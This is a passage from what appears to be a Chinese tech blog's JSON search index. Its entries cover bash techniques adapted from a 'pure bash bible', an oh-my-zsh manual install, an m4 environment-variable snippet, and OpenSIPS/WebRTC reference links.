收到的参数个数 echo $@ # 列表方式的参数 $1 $2 $3 echo $?","title":"常用shell技巧"},{"content":"参考 https://www.opensips.org/Documentation/Tutorials-WebSocket-2-2 https://opensips.org/pub/events/2016-05-10_OpenSIPS-Summit_Amsterdam/Pete_Kelly-OpenSIPS_Summit2016-OpenSIPSandWebRTC.pdf pdf附件 Eric_Tamme-OpenSIPS_Summit_Austin_2015-WebRTC_with_OpenSIPS.pdf Pete_Kelly-OpenSIPS_Summit2016-OpenSIPSandWebRTC.pdf ","permalink":"https://wdd.js.org/opensips/ch9/webrtc-pdf/","summary":"参考 https://www.opensips.org/Documentation/Tutorials-WebSocket-2-2 https://opensips.org/pub/events/2016-05-10_OpenSIPS-Summit_Amsterdam/Pete_Kelly-OpenSIPS_Summit2016-OpenSIPSandWebRTC.pdf pdf附件 Eric_Tamme-OpenSIPS_Summit_Austin_2015-WebRTC_with_OpenSIPS.pdf Pete_Kelly-OpenSIPS_Summit2016-OpenSIPSandWebRTC.pdf ","title":"opensips 与 webrtc资料整理"},{"content":"yum install zsh -y # github上的项目下载太慢,所以我就把项目克隆到gitee上,这样克隆速度就非常快 git clone https://gitee.com/nuannuande/oh-my-zsh.git ~/.oh-my-zsh # 这一步是可选的 cp ~/.zshrc ~/.zshrc.orig # 这一步是必须的 cp ~/.oh-my-zsh/templates/zshrc.zsh-template ~/.zshrc # 改变默认的sh, 如果这一步报错,就再次输入 zsh chsh -s $(which zsh) ","permalink":"https://wdd.js.org/shell/manu-install-ohmyzsh/","summary":"yum install zsh -y # github上的项目下载太慢,所以我就把项目克隆到gitee上,这样克隆速度就非常快 git clone https://gitee.com/nuannuande/oh-my-zsh.git ~/.oh-my-zsh # 这一步是可选的 cp ~/.zshrc ~/.zshrc.orig # 这一步是必须的 cp ~/.oh-my-zsh/templates/zshrc.zsh-template ~/.zshrc # 改变默认的sh, 如果这一步报错,就再次输入 zsh chsh -s $(which zsh) ","title":"手工安装oh-my-zsh"},{"content":"define(`CF_INNER_IP\u0026#39;, `esyscmd(`printf \u0026#34;$PWD\u0026#34;\u0026#39;)\u0026#39;) ","permalink":"https://wdd.js.org/shell/m4-env/","summary":"define(`CF_INNER_IP\u0026#39;, `esyscmd(`printf \u0026#34;$PWD\u0026#34;\u0026#39;)\u0026#39;) ","title":"m4读取环境变量"},{"content":"字符串 字符串包含 Using a test:\nif [[ $var == *sub_string* ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;sub_string is in var.\u0026#34; fi # Inverse (substring not in string). if [[ $var != *sub_string* ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;sub_string is not in var.\u0026#34; fi # This works for arrays too! if [[ ${arr[*]} == *sub_string* ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;sub_string is in array.\u0026#34; fi Using a case statement:\ncase \u0026#34;$var\u0026#34; in *sub_string*) # Do stuff ;; *sub_string2*) # Do more stuff ;; *) # Else ;; esac 字符串开始 if [[ $var == sub_string* ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;var starts with sub_string.\u0026#34; fi # Inverse (var does not start with sub_string). if [[ $var != sub_string* ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;var does not start with sub_string.\u0026#34; fi 字符串结尾 if [[ $var == *sub_string ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;var ends with sub_string.\u0026#34; fi # Inverse (var does not end with sub_string). if [[ $var != *sub_string ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;var does not end with sub_string.\u0026#34; fi 循环 数字范围循环 Alternative to seq.\n# Loop from 0-100 (no variable support). for i in {0..100}; do printf \u0026#39;%s\\n\u0026#39; \u0026#34;$i\u0026#34; done 变量循环 Alternative to seq.\n# Loop from 0-VAR. VAR=50 for ((i=0;i\u0026lt;=VAR;i++)); do printf \u0026#39;%s\\n\u0026#39; \u0026#34;$i\u0026#34; done 数组遍历 arr=(apples oranges tomatoes) # Just elements. for element in \u0026#34;${arr[@]}\u0026#34;; do printf \u0026#39;%s\\n\u0026#39; \u0026#34;$element\u0026#34; done 索引遍历 arr=(apples oranges tomatoes) # Elements and index. for i in \u0026#34;${!arr[@]}\u0026#34;; do printf \u0026#39;%s\\n\u0026#39; \u0026#34;${arr[i]}\u0026#34; done # Alternative method. for ((i=0;i\u0026lt;${#arr[@]};i++)); do printf \u0026#39;%s\\n\u0026#39; \u0026#34;${arr[i]}\u0026#34; done 文件或者目录遍历 Don’t use ls.\n# Greedy example. for file in *; do printf \u0026#39;%s\\n\u0026#39; \u0026#34;$file\u0026#34; done # PNG files in dir. for file in ~/Pictures/*.png; do printf \u0026#39;%s\\n\u0026#39; \u0026#34;$file\u0026#34; done # Iterate over directories. for dir in ~/Downloads/*/; do printf \u0026#39;%s\\n\u0026#39; \u0026#34;$dir\u0026#34; done # Brace Expansion. for file in /path/to/parentdir/{file1,file2,subdir/file3}; do printf \u0026#39;%s\\n\u0026#39; \u0026#34;$file\u0026#34; done # Iterate recursively. shopt -s globstar for file in ~/Pictures/**/*; do printf \u0026#39;%s\\n\u0026#39; \u0026#34;$file\u0026#34; done shopt -u globstar 文件处理 CAVEAT: bash does not handle binary data properly in versions \u0026lt; 4.4.\n将文件读取为字符串 Alternative to the cat command.\nfile_data=\u0026#34;$(\u0026lt;\u0026#34;file\u0026#34;)\u0026#34; 将文件按行读取成数组 Alternative to the cat command.\n# Bash \u0026lt;4 (discarding empty lines). IFS=$\u0026#39;\\n\u0026#39; read -d \u0026#34;\u0026#34; -ra file_data \u0026lt; \u0026#34;file\u0026#34; # Bash \u0026lt;4 (preserving empty lines). while read -r line; do file_data+=(\u0026#34;$line\u0026#34;) done \u0026lt; \u0026#34;file\u0026#34; # Bash 4+ mapfile -t file_data \u0026lt; \u0026#34;file\u0026#34; 获取文件头部的 N 行 Alternative to the head command.\nCAVEAT: Requires bash 4+\nExample Function:\nhead() { # Usage: head \u0026#34;n\u0026#34; \u0026#34;file\u0026#34; mapfile -tn \u0026#34;$1\u0026#34; line \u0026lt; \u0026#34;$2\u0026#34; printf \u0026#39;%s\\n\u0026#39; \u0026#34;${line[@]}\u0026#34; } Example Usage:\n$ head 2 ~/.bashrc # Prompt PS1=\u0026#39;➜ \u0026#39; $ head 1 ~/.bashrc # Prompt 获取尾部 N 行 Alternative to the tail command.\nCAVEAT: Requires bash 4+\nExample Function:\ntail() { # Usage: tail \u0026#34;n\u0026#34; \u0026#34;file\u0026#34; mapfile -tn 0 line \u0026lt; \u0026#34;$2\u0026#34; printf \u0026#39;%s\\n\u0026#39; \u0026#34;${line[@]: -$1}\u0026#34; } Example Usage:\n$ tail 2 ~/.bashrc # Enable tmux. # [[ -z \u0026#34;$TMUX\u0026#34; ]] \u0026amp;\u0026amp; exec tmux $ tail 1 ~/.bashrc # [[ -z \u0026#34;$TMUX\u0026#34; ]] \u0026amp;\u0026amp; exec tmux 获取文件行数 Alternative to wc -l.\nExample Function (bash 4):\nlines() { # Usage: lines \u0026#34;file\u0026#34; mapfile -tn 0 lines \u0026lt; \u0026#34;$1\u0026#34; printf \u0026#39;%s\\n\u0026#39; \u0026#34;${#lines[@]}\u0026#34; } Example Function (bash 3):\nThis method uses less memory than the mapfile method and works in bash 3 but it is slower for bigger files.\nlines_loop() { # Usage: lines_loop \u0026#34;file\u0026#34; count=0 while IFS= read -r _; do ((count++)) done \u0026lt; \u0026#34;$1\u0026#34; printf \u0026#39;%s\\n\u0026#39; \u0026#34;$count\u0026#34; } Example Usage:\n$ lines ~/.bashrc 48 $ lines_loop ~/.bashrc 48 计算文件或者文件夹数量 This works by passing the output of the glob to the function and then counting the number of arguments.\nExample Function:\ncount() { # Usage: count /path/to/dir/* # count /path/to/dir/*/ printf \u0026#39;%s\\n\u0026#39; \u0026#34;$#\u0026#34; } Example Usage:\n# Count all files in dir. $ count ~/Downloads/* 232 # Count all dirs in dir. $ count ~/Downloads/*/ 45 # Count all jpg files in dir. $ count ~/Pictures/*.jpg 64 创建临时文件 Alternative to touch.\n# Shortest. \u0026gt;file # Longer alternatives: :\u0026gt;file echo -n \u0026gt;file printf \u0026#39;\u0026#39; \u0026gt;file 在两个标记之间抽取 N 行 Example Function:\nextract() { # Usage: extract file \u0026#34;opening marker\u0026#34; \u0026#34;closing marker\u0026#34; while IFS=$\u0026#39;\\n\u0026#39; read -r line; do [[ $extract \u0026amp;\u0026amp; $line != \u0026#34;$3\u0026#34; ]] \u0026amp;\u0026amp; printf \u0026#39;%s\\n\u0026#39; \u0026#34;$line\u0026#34; [[ $line == \u0026#34;$2\u0026#34; ]] \u0026amp;\u0026amp; extract=1 [[ $line == \u0026#34;$3\u0026#34; ]] \u0026amp;\u0026amp; extract= done \u0026lt; \u0026#34;$1\u0026#34; } Example Usage:\n# Extract code blocks from MarkDown file. $ extract ~/projects/pure-bash/README.md \u0026#39;```sh\u0026#39; \u0026#39;```\u0026#39; # Output here... 文件路径 获取文件的目录 Alternative to the dirname command.\nExample Function:\ndirname() { # Usage: dirname \u0026#34;path\u0026#34; local tmp=${1:-.} [[ $tmp != *[!/]* ]] \u0026amp;\u0026amp; { printf \u0026#39;/\\n\u0026#39; return } tmp=${tmp%%\u0026#34;${tmp##*[!/]}\u0026#34;} [[ $tmp != */* ]] \u0026amp;\u0026amp; { printf \u0026#39;.\\n\u0026#39; return } tmp=${tmp%/*} tmp=${tmp%%\u0026#34;${tmp##*[!/]}\u0026#34;} printf \u0026#39;%s\\n\u0026#39; \u0026#34;${tmp:-/}\u0026#34; } Example Usage:\n$ dirname ~/Pictures/Wallpapers/1.jpg /home/black/Pictures/Wallpapers $ dirname ~/Pictures/Downloads/ /home/black/Pictures 获取文件路径的 base-name Alternative to the basename command.\nExample Function:\nbasename() { # Usage: basename \u0026#34;path\u0026#34; [\u0026#34;suffix\u0026#34;] local tmp tmp=${1%\u0026#34;${1##*[!/]}\u0026#34;} tmp=${tmp##*/} tmp=${tmp%\u0026#34;${2/\u0026#34;$tmp\u0026#34;}\u0026#34;} printf \u0026#39;%s\\n\u0026#39; \u0026#34;${tmp:-/}\u0026#34; } Example Usage:\n$ basename ~/Pictures/Wallpapers/1.jpg 1.jpg $ basename ~/Pictures/Wallpapers/1.jpg .jpg 1 $ basename ~/Pictures/Downloads/ Downloads 变量 变量声明和使用 $ hello_world=\u0026#34;value\u0026#34; # Create the variable name. $ var=\u0026#34;world\u0026#34; $ ref=\u0026#34;hello_$var\u0026#34; # Print the value of the variable name stored in \u0026#39;hello_$var\u0026#39;. $ printf \u0026#39;%s\\n\u0026#39; \u0026#34;${!ref}\u0026#34; value Alternatively, on bash 4.3+:\n$ hello_world=\u0026#34;value\u0026#34; $ var=\u0026#34;world\u0026#34; # Declare a nameref. $ declare -n ref=hello_$var $ printf \u0026#39;%s\\n\u0026#39; \u0026#34;$ref\u0026#34; value 基于变量命名变量 $ var=\u0026#34;world\u0026#34; $ declare \u0026#34;hello_$var=value\u0026#34; $ printf \u0026#39;%s\\n\u0026#39; \u0026#34;$hello_world\u0026#34; value ESCAPE SEQUENCES Contrary to popular belief, there is no issue in utilizing raw escape sequences. Using tput abstracts the same ANSI sequences as if printed manually. Worse still, tput is not actually portable. There are a number of tput variants each with different commands and syntaxes (try tput setaf 3 on a FreeBSD system). Raw sequences are fine.\n文本颜色 NOTE: Sequences requiring RGB values only work in True-Color Terminal Emulators.\nSequence What does it do? Value \\e[38;5;\u0026lt;NUM\u0026gt;m Set text foreground color. 0-255 \\e[48;5;\u0026lt;NUM\u0026gt;m Set text background color. 0-255 \\e[38;2;\u0026lt;R\u0026gt;;\u0026lt;G\u0026gt;;\u0026lt;B\u0026gt;m Set text foreground color to RGB color. R, G, B \\e[48;2;\u0026lt;R\u0026gt;;\u0026lt;G\u0026gt;;\u0026lt;B\u0026gt;m Set text background color to RGB color. R, G, B 文本属性 NOTE: Prepend 2 to any code below to turn it\u0026rsquo;s effect off(examples: 21=bold text off, 22=faint text off, 23=italic text off).\nSequence What does it do? \\e[m Reset text formatting and colors. \\e[1m Bold text. \\e[2m Faint text. \\e[3m Italic text. \\e[4m Underline text. \\e[5m Blinking text. \\e[7m Highlighted text. \\e[8m Hidden text. \\e[9m Strike-through text. 光标移动 Sequence What does it do? Value \\e[\u0026lt;LINE\u0026gt;;\u0026lt;COLUMN\u0026gt;H Move cursor to absolute position. line, column \\e[H Move cursor to home position (0,0). \\e[\u0026lt;NUM\u0026gt;A Move cursor up N lines. num \\e[\u0026lt;NUM\u0026gt;B Move cursor down N lines. num \\e[\u0026lt;NUM\u0026gt;C Move cursor right N columns. num \\e[\u0026lt;NUM\u0026gt;D Move cursor left N columns. num \\e[s Save cursor position. \\e[u Restore cursor position. 文本擦除 Sequence What does it do? \\e[K Erase from cursor position to end of line. \\e[1K Erase from cursor position to start of line. \\e[2K Erase the entire current line. \\e[J Erase from the current line to the bottom of the screen. \\e[1J Erase from the current line to the top of the screen. \\e[2J Clear the screen. \\e[2J\\e[H Clear the screen and move cursor to 0,0. 参数展开 指令 Parameter What does it do? ${!VAR} Access a variable based on the value of VAR. ${!VAR*} Expand to IFS separated list of variable names starting with VAR. ${!VAR@} Expand to IFS separated list of variable names starting with VAR. If double-quoted, each variable name expands to a separate word. 替换 Parameter What does it do? ${VAR#PATTERN} Remove shortest match of pattern from start of string. ${VAR##PATTERN} Remove longest match of pattern from start of string. ${VAR%PATTERN} Remove shortest match of pattern from end of string. ${VAR%%PATTERN} Remove longest match of pattern from end of string. ${VAR/PATTERN/REPLACE} Replace first match with string. ${VAR//PATTERN/REPLACE} Replace all matches with string. ${VAR/PATTERN} Remove first match. ${VAR//PATTERN} Remove all matches. 长度 Parameter What does it do? ${#VAR} Length of var in characters. ${#ARR[@]} Length of array in elements. 展开 Parameter What does it do? ${VAR:OFFSET} Remove first N chars from variable. ${VAR:OFFSET:LENGTH} Get substring from N character to N character. (${VAR:10:10}: Get sub-string from char 10 to char 20) ${VAR:: OFFSET} Get first N chars from variable. ${VAR:: -OFFSET} Remove last N chars from variable. ${VAR: -OFFSET} Get last N chars from variable. ${VAR:OFFSET:-OFFSET} Cut first N chars and last N chars. 大小写修改 Parameter What does it do? CAVEAT ${VAR^} Uppercase first character. bash 4+ ${VAR^^} Uppercase all characters. bash 4+ ${VAR,} Lowercase first character. bash 4+ ${VAR,,} Lowercase all characters. bash 4+ ${VAR~} Reverse case of first character. bash 4+ ${VAR~~} Reverse case of all characters. bash 4+ 默认值 Parameter What does it do? ${VAR:-STRING} If VAR is empty or unset, use STRING as its value. ${VAR-STRING} If VAR is unset, use STRING as its value. ${VAR:=STRING} If VAR is empty or unset, set the value of VAR to STRING. ${VAR=STRING} If VAR is unset, set the value of VAR to STRING. ${VAR:+STRING} If VAR is not empty, use STRING as its value. ${VAR+STRING} If VAR is set, use STRING as its value. ${VAR:?STRING} Display an error if empty or unset. ${VAR?STRING} Display an error if unset. 大括号展开 范围 # Syntax: {\u0026lt;START\u0026gt;..\u0026lt;END\u0026gt;} # Print numbers 1-100. echo {1..100} # Print range of floats. echo 1.{1..9} # Print chars a-z. echo {a..z} echo {A..Z} # Nesting. echo {A..Z}{0..9} # Print zero-padded numbers. # CAVEAT: bash 4+ echo {01..100} # Change increment amount. # Syntax: {\u0026lt;START\u0026gt;..\u0026lt;END\u0026gt;..\u0026lt;INCREMENT\u0026gt;} # CAVEAT: bash 4+ echo {1..10..2} # Increment by 2. 字符串列表 echo {apples,oranges,pears,grapes} # Example Usage: # Remove dirs Movies, Music and ISOS from ~/Downloads/. rm -rf ~/Downloads/{Movies,Music,ISOS} 条件表达式 文件条件判断 Expression Value What does it do? -a file If file exists. -b file If file exists and is a block special file. -c file If file exists and is a character special file. -d file If file exists and is a directory. -e file If file exists. -f file If file exists and is a regular file. -g file If file exists and its set-group-id bit is set. -h file If file exists and is a symbolic link. -k file If file exists and its sticky-bit is set -p file If file exists and is a named pipe (FIFO). -r file If file exists and is readable. -s file If file exists and its size is greater than zero. -t fd If file descriptor is open and refers to a terminal. -u file If file exists and its set-user-id bit is set. -w file If file exists and is writable. -x file If file exists and is executable. -G file If file exists and is owned by the effective group ID. -L file If file exists and is a symbolic link. -N file If file exists and has been modified since last read. -O file If file exists and is owned by the effective user ID. -S file If file exists and is a socket. 文件比较 Expression What does it do? file -ef file2 If both files refer to the same inode and device numbers. file -nt file2 If file is newer than file2 (uses modification time) or file exists and file2 does not. file -ot file2 If file is older than file2 (uses modification time) or file2 exists and file does not. 变量测试 Expression Value What does it do? -o opt If shell option is enabled. -v var If variable has a value assigned. -R var If variable is a name reference. -z var If the length of string is zero. -n var If the length of string is non-zero. 变量比较 Expression What does it do? var = var2 Equal to. var == var2 Equal to (synonym for =). var != var2 Not equal to. var \u0026lt; var2 Less than (in ASCII alphabetical order.) var \u0026gt; var2 Greater than (in ASCII alphabetical order.) 算数操作 赋值 Operators What does it do? = Initialize or change the value of a variable. 算数 Operators What does it do? + Addition - Subtraction * Multiplication / Division ** Exponentiation % Modulo += Plus-Equal (Increment a variable.) -= Minus-Equal (Decrement a variable.) *= Times-Equal (Multiply a variable.) /= Slash-Equal (Divide a variable.) %= Mod-Equal (Remainder of dividing a variable.) 位操作 Operators What does it do? \u0026lt;\u0026lt; Bitwise Left Shift \u0026lt;\u0026lt;= Left-Shift-Equal \u0026gt;\u0026gt; Bitwise Right Shift \u0026gt;\u0026gt;= Right-Shift-Equal \u0026amp; Bitwise AND \u0026amp;= Bitwise AND-Equal | Bitwise OR |= Bitwise OR-Equal ~ Bitwise NOT ^ Bitwise XOR ^= Bitwise XOR-Equal 逻辑 Operators What does it do? ! NOT \u0026amp;\u0026amp; AND || OR Miscellaneous Operators What does it do? Example , Comma Separator ((a=1,b=2,c=3)) ARITHMETIC Simpler syntax to set variables # Simple math ((var=1+2)) # Decrement/Increment variable ((var++)) ((var--)) ((var+=1)) ((var-=1)) # Using variables ((var=var2*arr[2])) Ternary Tests # Set the value of var to var2 if var2 is greater than var. # var: variable to set. # var2\u0026gt;var: Condition to test. # ?var2: If the test succeeds. # :var: If the test fails. ((var=var2\u0026gt;var?var2:var)) TRAPS Traps allow a script to execute code on various signals. In pxltrm (a pixel art editor written in bash) traps are used to redraw the user interface on window resize. Another use case is cleaning up temporary files on script exit.\nTraps should be added near the start of scripts so any early errors are also caught.\nNOTE: For a full list of signals, see trap -l.\nDo something on script exit # Clear screen on script exit. trap \u0026#39;printf \\\\e[2J\\\\e[H\\\\e[m\u0026#39; EXIT Ignore terminal interrupt (CTRL+C, SIGINT) trap \u0026#39;\u0026#39; INT React to window resize # Call a function on window resize. trap \u0026#39;code_here\u0026#39; SIGWINCH Do something before every command trap \u0026#39;code_here\u0026#39; DEBUG Do something when a shell function or a sourced file finishes executing trap \u0026#39;code_here\u0026#39; RETURN PERFORMANCE Disable Unicode If unicode is not required, it can be disabled for a performance increase. Results may vary however there have been noticeable improvements in neofetch and other programs.\n# Disable unicode. LC_ALL=C LANG=C OBSOLETE SYNTAX Shebang Use #!/usr/bin/env bash instead of #!/bin/bash.\nThe former searches the user\u0026rsquo;s PATH to find the bash binary. The latter assumes it is always installed to /bin/ which can cause issues. NOTE: There are times when one may have a good reason for using #!/bin/bash or another direct path to the binary.\n# Right: #!/usr/bin/env bash # Less right: #!/bin/bash Command Substitution Use $() instead of .\n# Right. var=\u0026#34;$(command)\u0026#34; # Wrong. var=`command` # $() can easily be nested whereas `` cannot. var=\u0026#34;$(command \u0026#34;$(command)\u0026#34;)\u0026#34; Function Declaration Do not use the function keyword, it reduces compatibility with older versions of bash.\n# Right. do_something() { # ... } # Wrong. function do_something() { # ... } INTERNAL VARIABLES Get the location to the bash binary \u0026#34;$BASH\u0026#34; Get the version of the current running bash process # As a string. \u0026#34;$BASH_VERSION\u0026#34; # As an array. \u0026#34;${BASH_VERSINFO[@]}\u0026#34; Open the user\u0026rsquo;s preferred text editor \u0026#34;$EDITOR\u0026#34; \u0026#34;$file\u0026#34; # NOTE: This variable may be empty, set a fallback value. \u0026#34;${EDITOR:-vi}\u0026#34; \u0026#34;$file\u0026#34; Get the name of the current function # Current function. \u0026#34;${FUNCNAME[0]}\u0026#34; # Parent function. \u0026#34;${FUNCNAME[1]}\u0026#34; # So on and so forth. \u0026#34;${FUNCNAME[2]}\u0026#34; \u0026#34;${FUNCNAME[3]}\u0026#34; # All functions including parents. \u0026#34;${FUNCNAME[@]}\u0026#34; Get the host-name of the system \u0026#34;$HOSTNAME\u0026#34; # NOTE: This variable may be empty. # Optionally set a fallback to the hostname command. \u0026#34;${HOSTNAME:-$(hostname)}\u0026#34; Get the architecture of the Operating System \u0026#34;$HOSTTYPE\u0026#34; Get the name of the Operating System / Kernel This can be used to add conditional support for different OperatingSystems without needing to call uname.\n\u0026#34;$OSTYPE\u0026#34; Get the current working directory This is an alternative to the pwd built-in.\n\u0026#34;$PWD\u0026#34; Get the number of seconds the script has been running \u0026#34;$SECONDS\u0026#34; Get a pseudorandom integer Each time $RANDOM is used, a different integer between 0 and 32767 is returned. This variable should not be used for anything related to security (this includes encryption keys etc).\n\u0026#34;$RANDOM\u0026#34; INFORMATION ABOUT THE TERMINAL Get the terminal size in lines and columns (from a script) This is handy when writing scripts in pure bash and stty/tput can’t becalled.\nExample Function:\nget_term_size() { # Usage: get_term_size # (:;:) is a micro sleep to ensure the variables are # exported immediately. shopt -s checkwinsize; (:;:) printf \u0026#39;%s\\n\u0026#39; \u0026#34;$LINES $COLUMNS\u0026#34; } Example Usage:\n# Output: LINES COLUMNS $ get_term_size 15 55 Get the terminal size in pixels CAVEAT: This does not work in some terminal emulators.\nExample Function:\nget_window_size() { # Usage: get_window_size printf \u0026#39;%b\u0026#39; \u0026#34;${TMUX:+\\\\ePtmux;\\\\e}\\\\e[14t${TMUX:+\\\\e\\\\\\\\}\u0026#34; IFS=\u0026#39;;t\u0026#39; read -d t -t 0.05 -sra term_size printf \u0026#39;%s\\n\u0026#39; \u0026#34;${term_size[1]}x${term_size[2]}\u0026#34; } Example Usage:\n# Output: WIDTHxHEIGHT $ get_window_size 1200x800 # Output (fail): $ get_window_size x Get the current cursor position This is useful when creating a TUI in pure bash.\nExample Function:\nget_cursor_pos() { # Usage: get_cursor_pos IFS=\u0026#39;[;\u0026#39; read -p $\u0026#39;\\e[6n\u0026#39; -d R -rs _ y x _ printf \u0026#39;%s\\n\u0026#39; \u0026#34;$x $y\u0026#34; } Example Usage:\n# Output: X Y $ get_cursor_pos 1 8 CONVERSION Convert a hex color to RGB Example Function:\nhex_to_rgb() { # Usage: hex_to_rgb \u0026#34;#FFFFFF\u0026#34; # hex_to_rgb \u0026#34;000000\u0026#34; : \u0026#34;${1/\\#}\u0026#34; ((r=16#${_:0:2},g=16#${_:2:2},b=16#${_:4:2})) printf \u0026#39;%s\\n\u0026#39; \u0026#34;$r $g $b\u0026#34; } Example Usage:\n$ hex_to_rgb \u0026#34;#FFFFFF\u0026#34; 255 255 255 Convert an RGB color to hex Example Function:\nrgb_to_hex() { # Usage: rgb_to_hex \u0026#34;r\u0026#34; \u0026#34;g\u0026#34; \u0026#34;b\u0026#34; printf \u0026#39;#%02x%02x%02x\\n\u0026#39; \u0026#34;$1\u0026#34; \u0026#34;$2\u0026#34; \u0026#34;$3\u0026#34; } Example Usage:\n$ rgb_to_hex \u0026#34;255\u0026#34; \u0026#34;255\u0026#34; \u0026#34;255\u0026#34; #FFFFFF CODE GOLF Shorter for loop syntax # Tiny C Style. for((;i++\u0026lt;10;)){ echo \u0026#34;$i\u0026#34;;} # Undocumented method. for i in {1..10};{ echo \u0026#34;$i\u0026#34;;} # Expansion. for i in {1..10}; do echo \u0026#34;$i\u0026#34;; done # C Style. for((i=0;i\u0026lt;=10;i++)); do echo \u0026#34;$i\u0026#34;; done Shorter infinite loops # Normal method while :; do echo hi; done # Shorter for((;;)){ echo hi;} Shorter function declaration # Normal method f(){ echo hi;} # Using a subshell f()(echo hi) # Using arithmetic # This can be used to assign integer values. # Example: f a=1 # f a++ f()(($1)) # Using tests, loops etc. # NOTE: ‘while’, ‘until’, ‘case’, ‘(())’, ‘[[]]’ can also be used. f()if true; then echo \u0026#34;$1\u0026#34;; fi f()for i in \u0026#34;$@\u0026#34;; do echo \u0026#34;$i\u0026#34;; done Shorter if syntax # One line # Note: The 3rd statement may run when the 1st is true [[ $var == hello ]] \u0026amp;\u0026amp; echo hi || echo bye [[ $var == hello ]] \u0026amp;\u0026amp; { echo hi; echo there; } || echo bye # Multi line (no else, single statement) # Note: The exit status may not be the same as with an if statement [[ $var == hello ]] \u0026amp;\u0026amp; echo hi # Multi line (no else) [[ $var == hello ]] \u0026amp;\u0026amp; { echo hi # ... } Simpler case statement to set variable The : built-in can be used to avoid repeating variable= in a case statement. The $_ variable stores the last argument of the last command. : always succeeds so it can be used to store the variable value.\n# Modified snippet from Neofetch. case \u0026#34;$OSTYPE\u0026#34; in \u0026#34;darwin\u0026#34;*) : \u0026#34;MacOS\u0026#34; ;; \u0026#34;linux\u0026#34;*) : \u0026#34;Linux\u0026#34; ;; *\u0026#34;bsd\u0026#34;* | \u0026#34;dragonfly\u0026#34; | \u0026#34;bitrig\u0026#34;) : \u0026#34;BSD\u0026#34; ;; \u0026#34;cygwin\u0026#34; | \u0026#34;msys\u0026#34; | \u0026#34;win32\u0026#34;) : \u0026#34;Windows\u0026#34; ;; *) printf \u0026#39;%s\\n\u0026#39; \u0026#34;Unknown OS detected, aborting...\u0026#34; \u0026gt;\u0026amp;2 exit 1 ;; esac # Finally, set the variable. os=\u0026#34;$_\u0026#34; OTHER Use read as an alternative to the sleep command Surprisingly, sleep is an external command and not a bash built-in.\nCAVEAT: Requires bash 4+\nExample Function:\nread_sleep() { # Usage: read_sleep 1 # read_sleep 0.2 read -rt \u0026#34;$1\u0026#34; \u0026lt;\u0026gt; \u0026lt;(:) || : } Example Usage:\nread_sleep 1 read_sleep 0.1 read_sleep 30 For performance-critical situations, where it is not economic to open and close an excessive number of file descriptors, the allocation of a file descriptor may be done only once for all invocations of read:\n(See the generic original implementation at https://blog.dhampir.no/content/sleeping-without-a-subprocess-in-bash-and-how-to-sleep-forever)\nexec {sleep_fd}\u0026lt;\u0026gt; \u0026lt;(:) while some_quick_test; do # equivalent of sleep 0.001 read -t 0.001 -u $sleep_fd done Check if a program is in the user\u0026rsquo;s PATH # There are 3 ways to do this and either one can be used. type -p executable_name \u0026amp;\u0026gt;/dev/null hash executable_name \u0026amp;\u0026gt;/dev/null command -v executable_name \u0026amp;\u0026gt;/dev/null # As a test. if type -p executable_name \u0026amp;\u0026gt;/dev/null; then # Program is in PATH. fi # Inverse. if ! type -p executable_name \u0026amp;\u0026gt;/dev/null; then # Program is not in PATH. fi # Example (Exit early if program is not installed). if ! type -p convert \u0026amp;\u0026gt;/dev/null; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;error: convert is not installed, exiting...\u0026#34; exit 1 fi Get the current date using strftime Bash’s printf has a built-in method of getting the date which can be used in place of the date command.\nCAVEAT: Requires bash 4+\nExample Function:\ndate() { # Usage: date \u0026#34;format\u0026#34; # See: \u0026#39;man strftime\u0026#39; for format. printf \u0026#34;%($1)T\\\\n\u0026#34; \u0026#34;-1\u0026#34; } Example Usage:\n# Using above function. $ date \u0026#34;%a %d %b - %l:%M %p\u0026#34; Fri 15 Jun - 10:00 AM # Using printf directly. $ printf \u0026#39;%(%a %d %b - %l:%M %p)T\\n\u0026#39; \u0026#34;-1\u0026#34; Fri 15 Jun - 10:00 AM # Assigning a variable using printf. $ printf -v date \u0026#39;%(%a %d %b - %l:%M %p)T\\n\u0026#39; \u0026#39;-1\u0026#39; $ printf \u0026#39;%s\\n\u0026#39; \u0026#34;$date\u0026#34; Fri 15 Jun - 10:00 AM Get the username of the current user CAVEAT: Requires bash 4.4+\n$ : \\\\u # Expand the parameter as if it were a prompt string. $ printf \u0026#39;%s\\n\u0026#39; \u0026#34;${_@P}\u0026#34; black Generate a UUID V4 CAVEAT: The generated value is not cryptographically secure.\nExample Function:\nuuid() { # Usage: uuid C=\u0026#34;89ab\u0026#34; for ((N=0;N\u0026lt;16;++N)); do B=\u0026#34;$((RANDOM%256))\u0026#34; case \u0026#34;$N\u0026#34; in 6) printf \u0026#39;4%x\u0026#39; \u0026#34;$((B%16))\u0026#34; ;; 8) printf \u0026#39;%c%x\u0026#39; \u0026#34;${C:$RANDOM%${#C}:1}\u0026#34; \u0026#34;$((B%16))\u0026#34; ;; 3|5|7|9) printf \u0026#39;%02x-\u0026#39; \u0026#34;$B\u0026#34; ;; *) printf \u0026#39;%02x\u0026#39; \u0026#34;$B\u0026#34; ;; esac done printf \u0026#39;\\n\u0026#39; } Example Usage:\n$ uuid d5b6c731-1310-4c24-9fe3-55d556d44374 Progress bars This is a simple way of drawing progress bars without needing a for loopin the function itself.\nExample Function:\nbar() { # Usage: bar 1 10 # ^----- Elapsed Percentage (0-100). # ^-- Total length in chars. ((elapsed=$1*$2/100)) # Create the bar with spaces. printf -v prog \u0026#34;%${elapsed}s\u0026#34; printf -v total \u0026#34;%$(($2-elapsed))s\u0026#34; printf \u0026#39;%s\\r\u0026#39; \u0026#34;[${prog// /-}${total}]\u0026#34; } Example Usage:\nfor ((i=0;i\u0026lt;=100;i++)); do # Pure bash micro sleeps (for the example). (:;:) \u0026amp;\u0026amp; (:;:) \u0026amp;\u0026amp; (:;:) \u0026amp;\u0026amp; (:;:) \u0026amp;\u0026amp; (:;:) # Print the bar. bar \u0026#34;$i\u0026#34; \u0026#34;10\u0026#34; done printf \u0026#39;\\n\u0026#39; Get the list of functions in a script get_functions() { # Usage: get_functions IFS=$\u0026#39;\\n\u0026#39; read -d \u0026#34;\u0026#34; -ra functions \u0026lt; \u0026lt;(declare -F) printf 